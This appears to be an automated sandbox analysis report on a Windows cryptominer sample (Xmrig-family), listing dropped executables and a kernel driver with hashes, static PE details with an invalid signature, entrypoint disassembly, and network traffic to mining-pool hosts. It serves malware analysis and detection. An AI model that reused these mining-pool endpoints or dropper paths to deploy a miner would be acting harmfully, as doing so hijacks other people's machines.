              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, oneocsp.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target conhost.exe, PID 7064 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              13:09:59API Interceptor30x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              51.15.65.182S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                  setup.exeGet hashmaliciousXmrigBrowse
                    Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                      2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                        gq83mrprwy.exeGet hashmaliciousXmrigBrowse
                          1DI50gCNGQ.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                            file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar, XmrigBrowse
                              file.exeGet hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousXmrigBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  xmr-eu1.nanopool.orgOTm8DpW32j.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.23.83
                                  TwrhjEKqxk.exeGet hashmaliciousXmrigBrowse
                                  • 54.37.137.114
                                  aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                                  • 162.19.224.121
                                  S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                  • 162.19.224.121
                                  Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 163.172.154.142
                                  BWP2uPDDxw.exeGet hashmaliciousXmrigBrowse
                                  • 163.172.154.142
                                  BkkZPdT1uc.exeGet hashmaliciousXmrigBrowse
                                  • 54.37.232.103
                                  Chrome.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  SetLoader.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  OnlineSASFRSecuriteInfo.com.Linux.Siggen.9999.5011.20467.elfGet hashmaliciousMiraiBrowse
                                  • 51.158.220.25
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 62.210.85.80
                                  fBcMVl6ns6.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                  • 163.172.136.118
                                  rpQF1aDIK4.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                  • 163.172.136.118
                                  test.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                  • 163.172.136.118
                                  path.ps1Get hashmaliciousDcRatBrowse
                                  • 163.172.136.118
                                  https://yourferguson.org/court-watch-october-30-2023/?fbclid=IwZXh0bgNhZW0CMTEAAR3dOwpQMI1HpEJMcLfneo2Ce-TuuXHtVI8-78YDrHW9adORVlMEABT0ELU_aem_CL7dDvEuGMkB8YFGhVQWUgGet hashmaliciousUnknownBrowse
                                  • 212.129.43.222
                                  SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                  • 62.210.201.207
                                  SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                  • 62.210.201.207
                                  na.elfGet hashmaliciousUnknownBrowse
                                  • 51.158.219.42

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Windows\Temp\uoqzkgppgdee.sysR4WCgDAfHB.exeGet hashmaliciousXmrigBrowse
                                    R4WCgDAfHB.exeGet hashmaliciousXmrigBrowse
                                      GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                        7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                          egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                            OTm8DpW32j.exeGet hashmaliciousXmrigBrowse
                                              zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                zufmUwylvo.exeGet hashmaliciousXmrigBrowse
                                                  0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                    eshkere.batGet hashmaliciousXmrigBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\WWhhc3A0rs.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2729064
                                                      Entropy (8bit):6.65718591723034
                                                      Encrypted:false
                                                      SSDEEP:49152:y4TML4f/rWRrZExL3Ge+K8sfIZVFmWQTaMKcfMwNX8BkgE:df/rWRN0L3Ge+xAIgWU9KcfMsX8G
                                                      MD5:5DF14B213736E361758FEC790BD16721
                                                      SHA1:019592D0EA29DD3037D8B0BD1BD65644AA02C74A
                                                      SHA-256:197AEEC0C11EC28146E26E140584BF05ADF81AC74AF87448776A2CF5C698EC4F
                                                      SHA-512:013A759A1F6D92581D5575EF0263D95442FF1F21C74B9A9E2853A07154472C6090753EE628BD75BD0E99142D733BD0A0C354A1099B4F2F8BD2447534363272FE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                      • Antivirus: Virustotal, Detection: 62%, Browse
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...pJ.g.........."......z....(.....@..........@..............................)...........`.................................................H...<.....(.......(......j).h:....).x...............................(.......8..............X............................text....x.......z.................. ..`.rdata...............~..............@..@.data...P.'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....)......h).............@..B........................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1510207563435464
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                      MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                      SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                      SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                      SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oy11hsh.c3w.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gzr1fdm.dyh.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfm2p3b.jxa.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqalxiqd.lmf.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Windows\Temp\__PSScriptPolicyTest_1agdplkg.wcb.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_eoluthrv.kz2.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_h001acxy.31r.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_kfz4gov4.ce0.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\uoqzkgppgdee.sys

                                                      Download File
                                                      Process:C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      • Antivirus: Virustotal, Detection: 4%, Browse
                                                      Joe Sandbox View:
                                                      • Filename: R4WCgDAfHB.exe, Detection: malicious, Browse
                                                      • Filename: R4WCgDAfHB.exe, Detection: malicious, Browse
                                                      • Filename: GGXhCiYFBw.exe, Detection: malicious, Browse
                                                      • Filename: 7K5DrSyL8Y.exe, Detection: malicious, Browse
                                                      • Filename: egFMhHSlmf.exe, Detection: malicious, Browse
                                                      • Filename: OTm8DpW32j.exe, Detection: malicious, Browse
                                                      • Filename: zufmUwylvo.exe, Detection: malicious, Browse
                                                      • Filename: zufmUwylvo.exe, Detection: malicious, Browse
                                                      • Filename: 0NSjUT34gS.exe, Detection: malicious, Browse
                                                      • Filename: eshkere.bat, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.65718591723034
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:WWhhc3A0rs.exe
                                                      File size:2'729'064 bytes
                                                      MD5:5df14b213736e361758fec790bd16721
                                                      SHA1:019592d0ea29dd3037d8b0bd1bd65644aa02c74a
                                                      SHA256:197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f
                                                      SHA512:013a759a1f6d92581d5575ef0263d95442ff1f21c74b9a9e2853a07154472c6090753ee628bd75bd0e99142d733bd0a0c354a1099b4f2f8bd2447534363272fe
                                                      SSDEEP:49152:y4TML4f/rWRrZExL3Ge+K8sfIZVFmWQTaMKcfMwNX8BkgE:df/rWRN0L3Ge+xAIgWU9KcfMsX8G
                                                      TLSH:3BC53399016523B0D83EE47277C6FDF7AD9E33C193A894E34BAA40A59840FC4F53A593
                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...pJ.g.........."......z....(.....@..........@..............................)...........`........................................

                                                      File Icon

                                                      Icon Hash:177154d6c64c2917

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x670B4A70 [Sun Oct 13 04:20:00 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:de41d4e0545d977de6ca665131bb479a

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Microsoft ID Verified CS AOC CA 01, O=Microsoft Corporation, C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 03/10/2024 07:22:21 06/10/2024 07:22:21
                                                      Subject Chain
                                                      • CN="GitHub, Inc.", O="GitHub, Inc.", L=San Francisco, S=California, C=US
                                                      Version:3
                                                      Thumbprint MD5:79CD4E87A2ED4A09F9F871A8021CFED4
                                                      Thumbprint SHA-1:6CAACC602454BCC06C78DEC8C948A91FBCB5A74B
                                                      Thumbprint SHA-256:9EA57460428392B3511EFB7BB2938EEC44BEA792AF9361525F2A6C972460CA41
                                                      Serial:3300019992904E2ADF1942F17C000000019992

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [00007ED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007F86E083CBBFh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [00007EC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007F86E083CBE0h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007F86E083CBDBh
                                                      dec esp
                                                      mov esi, dword ptr [00009679h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007F86E083CBB7h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007F86E083CB99h
                                                      dec eax
                                                      mov edi, dword ptr [00007E90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007F86E083CBBEh
                                                      mov ecx, 0000001Fh
                                                      call 00007F86E0844144h
                                                      jmp 00007F86E083CBD9h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007F86E083CBBBh
                                                      mov byte ptr [002865A9h], 00000001h
                                                      jmp 00007F86E083CBCBh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [00007E7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [00007E7Bh]
                                                      call 00007F86E084413Bh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007F86E083CBCBh
                                                      dec eax
                                                      mov ecx, dword ptr [00007E50h]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa5480x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x28c0000xfcd8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2890000x180.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x296a000x3a68.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x29c0000x78.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0xa6e00x158.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x78e60x7a0002d9eac2aeec3f5089af7c91588488e8False0.5074923155737705data6.15338975525263IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x90000x1c900x1e00604ac66a15dde83abd5b83d78c2407a2False0.4466145833333333zlib compressed data4.610968485507608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xb0000x27d6500x27c800b03b3d47de185156856bf68768a01895unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x2890000x1800x200fa0f9ca74a64e648e850696ac8b97d8aFalse0.505859375data3.1320443954396437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .00cfg0x28a0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .tls0x28b0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x28c0000xfcd80xfe00f16f8ef5830a5c5dfad39c582975d9c7False0.8178364911417323data7.496335100492163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x29c0000x780x200c58837d4ba072667d349e147cbd7531aFalse0.2265625data1.4154353229231451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x28c1600x828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.019636015325670497
                                                      RT_ICON0x28c9880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.6631205673758865
                                                      RT_ICON0x28cdf00xb846PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9992156696485353
                                                      RT_ICON0x2986380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.42166979362101314
                                                      RT_ICON0x2996e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.3296680497925311
                                                      RT_GROUP_ICON0x29bc880x4cdataEnglishUnited States0.7894736842105263

                                                      Imports

                                                      DLLImport
                                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 13, 2024 19:10:05.166187048 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:05.171225071 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:05.171283960 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:05.171539068 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:05.176377058 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:05.782062054 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:05.782121897 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:05.782258034 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:05.782938004 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:05.787861109 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:05.959321022 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:06.004332066 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:06.092139006 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:06.144956112 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:15.647780895 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:15.691761017 CEST4971310343192.168.2.651.15.65.182
                                                      Oct 13, 2024 19:10:20.427884102 CEST103434971351.15.65.182192.168.2.6
                                                      Oct 13, 2024 19:10:20.488625050 CEST4971310343192.168.2.651.15.65.182
